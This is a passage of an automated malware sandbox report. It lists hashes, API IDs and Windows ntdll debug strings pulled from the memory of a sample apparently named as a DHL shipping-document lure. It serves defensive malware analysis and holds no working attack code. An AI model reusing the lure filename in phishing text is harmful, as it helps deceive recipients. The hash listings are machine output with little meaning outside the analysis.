                • Opcode ID: 69a78bd476d5e63909736fe786c0169ff5a96c18b16d6cc70b753916facb3464
                • Instruction ID: 00a0f72b7c72178c8b8cc87b9f96d3d25893befcc90453d079825a7ec5214e9c
                • Opcode Fuzzy Hash: 69a78bd476d5e63909736fe786c0169ff5a96c18b16d6cc70b753916facb3464
                • Instruction Fuzzy Hash: 98E0DFB62003007BC110BA9ADC01F97736CDFC5714F004029FA0CA7141C6B0B90087A0

                Control-flow Graph

                control_flow_graph 104 1b42c0a-1b42c0f 105 1b42c11-1b42c18 104->105 106 1b42c1f-1b42c26 LdrInitializeThunk 104->106
                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: de8ff29385b03cd351c369c293bd367015154af1c22fa580c8a2e0740ad42ada
                • Instruction ID: 1f521794f0d1f3f753b457801d4a1acbb987baa1ea3c0bb7688d6a6d804599f6
                • Opcode Fuzzy Hash: de8ff29385b03cd351c369c293bd367015154af1c22fa580c8a2e0740ad42ada
                • Instruction Fuzzy Hash: 7EB09B729015C5C6DB55E76456087277900B7D0701F15C0E1F2030642F4778C1D1F675
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                • API String ID: 0-2160512332
                • Opcode ID: a4a3c8064102c60e1969b85aa114662fddd429634d29e68a34839de1a6212f6d
                • Instruction ID: e1c91fd39ef1e508ca058d1654079163946aade1ff9f874d8a9a0cbc7f8cabb1
                • Opcode Fuzzy Hash: a4a3c8064102c60e1969b85aa114662fddd429634d29e68a34839de1a6212f6d
                • Instruction Fuzzy Hash: 3D928F71604342AFEB29EE19C840B6BBBE8FF84B54F04499DFA95D7250D770E844CB52
                Strings
                • Critical section address., xrefs: 01B75502
                • corrupted critical section, xrefs: 01B754C2
                • double initialized or corrupted critical section, xrefs: 01B75508
                • Critical section debug info address, xrefs: 01B7541F, 01B7552E
                • Critical section address, xrefs: 01B75425, 01B754BC, 01B75534
                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B7540A, 01B75496, 01B75519
                • Thread identifier, xrefs: 01B7553A
                • Thread is in a state in which it cannot own a critical section, xrefs: 01B75543
                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B754E2
                • Address of the debug info found in the active list., xrefs: 01B754AE, 01B754FA
                • 8, xrefs: 01B752E3
                • Invalid debug info address of this critical section, xrefs: 01B754B6
                • undeleted critical section in freed memory, xrefs: 01B7542B
                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01B754CE
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                • API String ID: 0-2368682639
                • Opcode ID: bc99ab0d1e5cdd810857fdb9866cdb6308e421e34785cac75b19f78099deb550
                • Instruction ID: ecae26f32875fd367d523b586e7af235421c404324ec8c4ff71418cbe0746527
                • Opcode Fuzzy Hash: bc99ab0d1e5cdd810857fdb9866cdb6308e421e34785cac75b19f78099deb550
                • Instruction Fuzzy Hash: BB81B9B1A00359BFDB24CF99C884BAEBBF5FB08B04F144199F615B7290D375A940CB60
                Strings
                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01B722E4
                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01B72624
                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01B724C0
                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01B72412
                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01B72409
                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01B72506
                • @, xrefs: 01B7259B
                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01B72602
                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01B725EB
                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01B72498
                • RtlpResolveAssemblyStorageMapEntry, xrefs: 01B7261F
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                • API String ID: 0-4009184096
                • Opcode ID: 8ae4ecfa0491d0d2c945883da7acf599b36ac6d7438236852b2979f35726d4a5
                • Instruction ID: 83cabb5f9e8ee8b8c0d0506d4d2272404e18f2b8bbe243d7829e7c36ab87f0a5
                • Opcode Fuzzy Hash: 8ae4ecfa0491d0d2c945883da7acf599b36ac6d7438236852b2979f35726d4a5
                • Instruction Fuzzy Hash: 38025FF5D002299FDF25DB58CC80BAAB7B8AB54714F4041DAE709A7241EB309F94CF59
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                • API String ID: 0-2515994595
                • Opcode ID: 5e56b642bf1d2cececbbc41785da7895fcf3d5e13daa258916afe8286bef4ced
                • Instruction ID: 7467c14e5a3e075127a660198d4fd30ecb05200c69da74ae48d25b9ca68a9386
                • Opcode Fuzzy Hash: 5e56b642bf1d2cececbbc41785da7895fcf3d5e13daa258916afe8286bef4ced
                • Instruction Fuzzy Hash: 5251F0711087119BC72EDF188844BABBBE8FF94244F944A9EE999C3640E770D644CBD2
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                • API String ID: 0-1700792311
                • Opcode ID: a0d00a56b3fe560b203a5cbea081d3dbe061a3182edcb124a63384a71e8276af
                • Instruction ID: d9422ecb9ea7ff30cc1135349dd153646278f5b7d409d776acbfb177d6c4e1ce
                • Opcode Fuzzy Hash: a0d00a56b3fe560b203a5cbea081d3dbe061a3182edcb124a63384a71e8276af
                • Instruction Fuzzy Hash: 21D1BF31500685EFDB2AEFA8C480AFEBBF1FF59610F18809DF5469BA52C7B49945CB10
                Strings
                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01B88A67
                • HandleTraces, xrefs: 01B88C8F
                • AVRF: -*- final list of providers -*- , xrefs: 01B88B8F
                • VerifierDlls, xrefs: 01B88CBD
                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01B88A3D
                • VerifierFlags, xrefs: 01B88C50
                • VerifierDebug, xrefs: 01B88CA5
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                • API String ID: 0-3223716464
                • Opcode ID: 05263f1803c06e1ece0ced88c38b8b8350c740feab422aae8c7f1e73330ad494
                • Instruction ID: d7a48993c9bff7b2a2d26a4df2722df991865636dc582f43922c437f09cbaa8c
                • Opcode Fuzzy Hash: 05263f1803c06e1ece0ced88c38b8b8350c740feab422aae8c7f1e73330ad494
                • Instruction Fuzzy Hash: A5911671641716AFDB39FF689880F2A7BA8EB94F14F8505DCFA45AB241C730AC05CB91
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                • API String ID: 0-1109411897
                • Opcode ID: aa00c7d68c2808d45f4f467ec02391f21620057239f08e61bb175f4e30d4f664
                • Instruction ID: ed4d9b030f8f1d8d7a0d06f934900e3341a96cbb53f95d262289bbaa02192314
                • Opcode Fuzzy Hash: aa00c7d68c2808d45f4f467ec02391f21620057239f08e61bb175f4e30d4f664
                • Instruction Fuzzy Hash: CCA24870A0562A8FDF79DF19C9887A9BBB5EF59304F1442E9D90DA7290DB349E81CF00
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                • API String ID: 0-792281065
                • Opcode ID: 1988306780e65981a1828ebe5b7ae4414d83e68eb18b4bda899d17d866bfe219
                • Instruction ID: 287b7ecfc01829c64e836732a389576ec4ddabbe0e8280886480110ba724b9ae
                • Opcode Fuzzy Hash: 1988306780e65981a1828ebe5b7ae4414d83e68eb18b4bda899d17d866bfe219
                • Instruction Fuzzy Hash: 05911670B01315ABEF3DEF18E848BAA7BA5FF80B14F1401EDE9216B681DB709951C791
                Strings
                • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 01B599ED
                • LdrpInitShimEngine, xrefs: 01B599F4, 01B59A07, 01B59A30
                • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01B59A2A
                • minkernel\ntdll\ldrinit.c, xrefs: 01B59A11, 01B59A3A
                • Getting the shim user exports failed with status 0x%08lx, xrefs: 01B59A01
                • apphelp.dll, xrefs: 01AF6496
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                • API String ID: 0-204845295
                • Opcode ID: aa90b3edc30b047eec623c951e93d9701b45b47b24ed420ea91d9cc59c9314bf
                • Instruction ID: 5f1a373de75cd77bf29b95c763a25a29437e0b7e588d75b713da5428a73db7c9
                • Opcode Fuzzy Hash: aa90b3edc30b047eec623c951e93d9701b45b47b24ed420ea91d9cc59c9314bf
                • Instruction Fuzzy Hash: E8519F71208305EBEB29EF64D945F6B77E8FB84748F04095EFA8997161D730E904CBA2
                Strings
                • Unable to build import redirection Table, Status = 0x%x, xrefs: 01B781E5
                • minkernel\ntdll\ldrredirect.c, xrefs: 01B78181, 01B781F5
                • minkernel\ntdll\ldrinit.c, xrefs: 01B3C6C3
                • LdrpInitializeProcess, xrefs: 01B3C6C4
                • Loading import redirection DLL: '%wZ', xrefs: 01B78170
                • LdrpInitializeImportRedirection, xrefs: 01B78177, 01B781EB
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                • API String ID: 0-475462383
                • Opcode ID: 578786cf2b290b37f4437f088cfe1361bd51349c4771beb03756b891125a6303
                • Instruction ID: acd8e3fd995f46fbe4d3b382aea96e5cf4eee5623fb0fff44fa915d70c75ea2c
                • Opcode Fuzzy Hash: 578786cf2b290b37f4437f088cfe1361bd51349c4771beb03756b891125a6303
                • Instruction Fuzzy Hash: 8431F571644306AFC628EF69D949E1A7BE4FF94B10F0405DCF945AB291DB20EC08C7A2
                Strings
                • RtlGetAssemblyStorageRoot, xrefs: 01B72160, 01B7219A, 01B721BA
                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01B7219F
                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01B721BF
                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01B72178
                • SXS: %s() passed the empty activation context, xrefs: 01B72165
                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01B72180
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                • API String ID: 0-861424205
                • Opcode ID: d81416985f5b1591544c09413a1eb2d7a73e12652cda379c518cdab6dba106cd
                • Instruction ID: 8a54ead98fe7d62dafdcf78e4f473cd57b331e6facc67053dd8419e41f979562
                • Opcode Fuzzy Hash: d81416985f5b1591544c09413a1eb2d7a73e12652cda379c518cdab6dba106cd
                • Instruction Fuzzy Hash: BF31E93AF40215B7EB2A9A9ADC45F6A7B78FBA4A50F0501DDFB1467240D3709E40C7E1
                APIs
                  • Part of subcall function 01B42DF0: LdrInitializeThunk.NTDLL ref: 01B42DFA
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B40BA3
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B40BB6
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B40D60
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B40D74
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                • String ID:
                • API String ID: 1404860816-0
                • Opcode ID: 135d2adc227fcdc7e99261a7d581efdc5b3b8697ecab1ecdd70d6ab64ea5817c
                • Instruction ID: ab779051c62dc10b274de4f02114594dbc12297cca823edbadc5ad3dad482b13
                • Opcode Fuzzy Hash: 135d2adc227fcdc7e99261a7d581efdc5b3b8697ecab1ecdd70d6ab64ea5817c
                • Instruction Fuzzy Hash: F2425A71900715DFDB29DF28C880BAAB7F4FF08314F1485E9EA999B241E770A984DF61
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                • API String ID: 0-379654539
                • Opcode ID: bb7408a5bce2c6298c7fdb0e4d0aedb6c9f29cbd06aff5ecce845b90bbdeff89
                • Instruction ID: 9647d0645c44a5a4b7f8015bd1f5e808bb6822c0c6bdd244e90e174b02da6fc2
                • Opcode Fuzzy Hash: bb7408a5bce2c6298c7fdb0e4d0aedb6c9f29cbd06aff5ecce845b90bbdeff89
                • Instruction Fuzzy Hash: 94C18F75108382CFD71ADF68C040B6ABBE4FF94704F048DA9F9968B291E739D949CB52
                Strings
                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01B3855E
                • minkernel\ntdll\ldrinit.c, xrefs: 01B38421
                • LdrpInitializeProcess, xrefs: 01B38422
                • @, xrefs: 01B38591
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                • API String ID: 0-1918872054
                • Opcode ID: 22ffce2c931423c5039ca518c58ad673634d53078996f8b423f6d3cdcbad2173
                • Instruction ID: 9be73eaaf5239a9ac9f6f6280131a26b28acba3531dba52e7f1b9aba5984e597
                • Opcode Fuzzy Hash: 22ffce2c931423c5039ca518c58ad673634d53078996f8b423f6d3cdcbad2173
                • Instruction Fuzzy Hash: CB91AD71548345AFDB2ADF65DC40EABBAE8FF84640F404AAEFA84D2150E334D9149B63
                Strings
                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01B721D9, 01B722B1
                • .Local, xrefs: 01B328D8
                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01B722B6
                • SXS: %s() passed the empty activation context, xrefs: 01B721DE
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                • API String ID: 0-1239276146
                • Opcode ID: 80bb613e6aa019236f0c04c4d4bf9c62a85e87f3765c6e712e1a1ad9e8153a84
                • Instruction ID: 9ecbaf24cd41985d00be02a3b6dca320e6f4cecdd2eaa5b968e8e4b90338776e
                • Opcode Fuzzy Hash: 80bb613e6aa019236f0c04c4d4bf9c62a85e87f3765c6e712e1a1ad9e8153a84
                • Instruction Fuzzy Hash: 58A1BF35900229DBDB29CF68D888BA9B7B1FF98314F1542E9D918AB251D730DE91CF90
                Strings
                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01B73456
                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01B7342A
                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01B73437
                • RtlDeactivateActivationContext, xrefs: 01B73425, 01B73432, 01B73451
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                • API String ID: 0-1245972979
                • Opcode ID: c70abdf92837024d66271c9bd83545f264cc3697d9ead0bd53943342f74eddb0
                • Instruction ID: d20cd34011ab318549bd24910a1658d458d61a8a25278a97534748ba94bedf64
                • Opcode Fuzzy Hash: c70abdf92837024d66271c9bd83545f264cc3697d9ead0bd53943342f74eddb0
                • Instruction Fuzzy Hash: 47613536640712AFDB2ECF1DC881B2AB7E1FF80B20F54859DE9659B251DB34E811CB91
                Strings
                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01B6106B
                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01B61028
                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01B60FE5
                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01B610AE
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                • API String ID: 0-1468400865
                • Opcode ID: be24640f48b5cdc309326c51ed86e34af04069eb9c3d3f79f7bb70d93ac67ee8
                • Instruction ID: 156c4479a79e055d8299d8ea4d2cb40396ae47c5911ba905cba247707fe4c9d7
                • Opcode Fuzzy Hash: be24640f48b5cdc309326c51ed86e34af04069eb9c3d3f79f7bb70d93ac67ee8
                • Instruction Fuzzy Hash: 7371D171904349AFCB26EF19C884B977FA8EF58764F4005A8F9488B286D735D588CBD2
                Strings
                • LdrpDynamicShimModule, xrefs: 01B6A998
                • minkernel\ntdll\ldrinit.c, xrefs: 01B6A9A2
                • apphelp.dll, xrefs: 01B22462
                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01B6A992
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                • API String ID: 0-176724104
                • Opcode ID: 61d425739ca83d29659e5ca63591aa95c16af6a95fc9f892a418e7b1f515dd72
                • Instruction ID: c850334f9728f6fdacf0b41c78d334ca1d839b5f56b97ba41469228c976368dc
                • Opcode Fuzzy Hash: 61d425739ca83d29659e5ca63591aa95c16af6a95fc9f892a418e7b1f515dd72
                • Instruction Fuzzy Hash: A1315975600201ABDF399F6DD885E6A7BF9FB94B00F2500DEF911B7295C774A941CB80
                Strings
                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01B1327D
                • HEAP: , xrefs: 01B13264
                • HEAP[%wZ]: , xrefs: 01B13255
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                • API String ID: 0-617086771
                • Opcode ID: 82184d0dc5c5615a1489d483bcdae29b990ac958e255861805159e727d8c23c8
                • Instruction ID: 4693a186751d4089f7c38e9206ceb60a94a5a029ae09237a790139315382a5eb
                • Opcode Fuzzy Hash: 82184d0dc5c5615a1489d483bcdae29b990ac958e255861805159e727d8c23c8
                • Instruction Fuzzy Hash: EC92CC71A042499FDB29CF68C4407AEBBF1FF08310F6985D9E849AB369E335A945CF50
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                • API String ID: 0-4253913091
                • Opcode ID: 7ef209b2c57a310abf69b778dabbc86111ac179484c9bb51a8350e88e7f3ea66
                • Instruction ID: e19d894f36c7c25f8462610d1449210d5e48648e12c07874d8b251bf694872c1
                • Opcode Fuzzy Hash: 7ef209b2c57a310abf69b778dabbc86111ac179484c9bb51a8350e88e7f3ea66
                • Instruction Fuzzy Hash: 21F1BB30A00606DFEB29DF68C890B6AB7F6FF54344F1582A8F5169B385D734E981CB90
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_1ad0000_DHL airwaybill # 6913321715 & BL Draft copy.jbxd
                Similarity
                • API ID:
                • String ID: $@
                • API String ID: 0-1077428164
                • Opcode ID: 5d36c292aaeec90417f4ecb719ac7be0e8afc9542d87cc5c46b863b98ecd5442
                • Instruction ID: 294bef29686dfd65941fd8eac9939d7348f255a9f8977c46077444d31c44a4ac
                • Opcode Fuzzy Hash: 5d36c292aaeec90417f4ecb719ac7be0e8afc9542d87cc5c46b863b98ecd5442
                • Instruction Fuzzy Hash: 28C280716083519FDB29CF29C840BABBBE5EF98714F0489ADF9C987251DB34D808CB56
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.2381826994.0000000001AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AD0000, based on PE: true
                Joe Sandbox IDA Plugin
